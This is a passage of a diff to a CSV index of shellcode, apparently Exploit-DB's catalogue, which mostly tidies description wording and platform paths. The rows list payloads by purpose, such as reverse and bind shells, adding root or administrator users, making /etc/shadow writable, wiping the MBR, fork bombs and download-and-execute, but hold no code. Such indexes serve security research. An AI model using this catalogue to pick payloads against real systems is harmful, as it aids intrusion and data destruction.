Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware 13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86 13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86 @@ -291,7 +292,7 @@ id,file,description,date,author,type,platform 13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86 -13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 +13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows 13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 @@ -302,22 +303,22 @@ id,file,description,date,author,type,platform 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86 13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86 -13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 +13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,linux_x86 13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows 13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows 13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86 -13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 -13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 +13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 -13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86 -13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86 +13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86 +13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86 13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86 13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86 13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86 @@ -331,21 +332,21 @@ id,file,description,date,author,type,platform 13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows 13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 -13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64 +13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86 13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86 13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86 13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86 13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator -13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 +13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86 13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 -13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86 13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86 -13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 +13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86 13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 @@ -357,12 +358,12 @@ id,file,description,date,author,type,platform 13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86 13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86 13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64 -13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 +13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 -13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 +13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64 13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 @@ -381,29 +382,29 @@ id,file,description,date,author,type,platform 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm 14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm -14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86 -14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm +14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86 +14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm 14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm -14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm +14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 -14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux +14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows -14234,shellcodes/linux/14234.c,"Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux +14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux -14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator -14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux +14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator +14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86 14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86 -14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 +14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86 -14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86 +14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86 14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows 14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm 15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86 -15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows +15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm 15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows 15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 @@ -412,15 +413,15 @@ id,file,description,date,author,type,platform 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm -15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx +15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator 15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 -17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 -17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx +17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 +17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx 17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator @@ -428,19 +429,19 @@ id,file,description,date,author,type,platform 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4 17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86 -17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx -17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips +17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx +17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4 -18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips +18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips -18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 +18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips -18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86 +18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86 18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64 -18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86 +18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm @@ -461,7 +462,7 @@ id,file,description,date,author,type,platform 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips 40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86 33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows -34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 +34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell 